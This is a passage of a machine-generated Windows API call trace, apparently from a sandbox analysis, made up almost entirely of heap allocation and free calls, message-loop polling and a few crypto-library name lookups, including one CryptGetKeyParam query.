(HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da238 [0033.462] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0033.462] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da158 [0033.463] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0033.463] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0033.463] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0033.463] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da158 | out: hHeap=0x770000) returned 1 [0033.463] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16c0 [0033.463] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da158 [0033.463] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1968 [0033.463] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0033.463] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da318 [0033.463] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0033.463] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889688 [0033.463] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a30 [0033.463] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0033.463] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da318 [0033.463] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0033.463] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a80 [0033.463] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0033.463] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0033.463] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0033.463] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b15a8 [0033.463] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0033.463] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0033.463] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0033.463] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0033.463] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0033.463] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0033.463] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1738 [0033.463] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0033.463] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da308 [0033.463] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb98 [0033.463] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da308 | out: hHeap=0x770000) returned 1 [0033.463] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae988 [0033.463] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da308 [0033.463] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16e8 [0033.463] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0033.463] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e138 [0033.464] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0033.464] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2d8 [0033.464] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0033.464] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1a8 [0033.464] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0033.464] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2e8 [0033.464] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0033.464] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da218 [0033.464] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0033.464] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da398 [0033.464] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0033.464] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da398 | out: hHeap=0x770000) returned 1 [0033.464] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0033.464] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da218 | out: hHeap=0x770000) returned 1 [0033.464] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0033.464] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0033.464] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2e8 [0033.464] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da218 [0033.464] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b16e8 | out: hHeap=0x770000) returned 1 [0033.464] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da308 | out: hHeap=0x770000) returned 1 [0033.464] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb98 | out: hHeap=0x770000) returned 1 [0033.464] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0033.464] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1738 | out: hHeap=0x770000) returned 1 [0033.464] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0033.464] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0033.464] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1738 [0033.464] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0033.464] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0033.464] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae948 [0033.464] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0033.464] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb98 [0033.464] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da308 [0033.464] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0033.464] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da398 [0033.465] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0033.465] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0033.465] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0033.465] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0033.465] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0033.465] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0033.465] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0033.465] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0033.465] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da398 | out: hHeap=0x770000) returned 1 [0033.465] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb98 | out: hHeap=0x770000) returned 1 [0033.465] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da308 | out: hHeap=0x770000) returned 1 [0033.465] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0033.465] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0033.465] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0033.465] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0033.465] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0033.465] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1738 | out: hHeap=0x770000) returned 1 [0033.465] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0033.465] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1738 [0033.465] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0033.465] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da308 [0033.465] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0033.465] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0033.465] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da398 [0033.465] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0033.465] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16e8 [0033.465] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0033.465] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0033.465] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da248 [0033.465] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0033.465] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0033.465] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0033.465] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da248 | out: hHeap=0x770000) returned 1 [0033.465] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cb98 [0033.466] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0033.466] PeekMessageW (in: lpMsg=0x6adcd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6adcd4) returned 0 [0033.466] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da248 [0033.466] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0033.466] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0033.466] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da248 | out: hHeap=0x770000) returned 1 [0033.466] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0033.466] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb98 | out: hHeap=0x770000) returned 1 [0033.466] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0033.466] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb98 [0033.466] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0033.466] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0033.466] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0033.466] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0033.466] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0033.466] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0033.466] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0033.466] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0033.466] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0033.466] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0033.466] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0033.466] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0033.466] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0033.466] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0033.466] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0033.466] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0033.466] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0033.466] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0033.466] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0033.466] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0033.466] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0033.466] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0033.466] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0033.467] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0033.467] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0033.467] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0033.467] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b16e8 | out: hHeap=0x770000) returned 1 [0033.467] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0033.467] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0033.467] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16e8 [0033.467] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0033.467] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da248 [0033.467] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae948 [0033.467] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0033.467] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0033.467] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da338 [0033.467] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0033.467] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da178 [0033.467] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da248 | out: hHeap=0x770000) returned 1 [0033.467] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0033.467] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da248 [0033.467] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da248 | out: hHeap=0x770000) returned 1 [0033.467] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0033.467] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0033.467] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0033.467] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0033.467] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0033.467] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0033.467] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0033.467] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0033.467] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b16e8 | out: hHeap=0x770000) returned 1 [0033.467] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0033.467] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0033.467] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0033.467] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0033.467] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0033.467] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0033.468] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0033.468] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16e8 [0033.468] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0033.468] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0033.468] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae948 [0033.468] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0033.468] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0033.468] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da178 [0033.468] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c820 [0033.468] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da248 [0033.468] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0033.468] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0033.468] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0033.468] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0033.468] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c820 | out: hHeap=0x770000) returned 1 [0033.468] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da248 | out: hHeap=0x770000) returned 1 [0033.468] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0033.468] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0033.468] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0033.468] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0033.468] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0033.468] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0033.468] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b16e8 | out: hHeap=0x770000) returned 1 [0033.468] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0033.468] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0033.468] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0033.468] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0033.468] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0033.468] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0033.468] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0033.468] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0033.468] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0033.469] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c820 [0033.469] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0033.469] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0033.469] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da178 [0033.469] CryptGetKeyParam (in: hKey=0x7c2280, dwParam=0x7, pbData=0x7da218, pdwDataLen=0x6adcf0, dwFlags=0x0 | out: pbData=0x7da218*=0x660e, pdwDataLen=0x6adcf0*=0x4) returned 1 [0033.469] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0033.469] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0033.469] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.469] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.469] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.469] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.469] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0033.469] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.469] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.469] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0033.469] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b70 | out: hHeap=0x770000) returned 1 [0033.469] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0033.469] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0033.469] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0033.469] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0033.469] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0033.469] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0033.469] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0033.469] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0033.469] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0033.469] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0033.469] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0033.469] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0033.470] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0033.470] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0033.470] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0033.470] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c958 | out: hHeap=0x770000) returned 1 [0033.470] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0033.470] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.470] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, 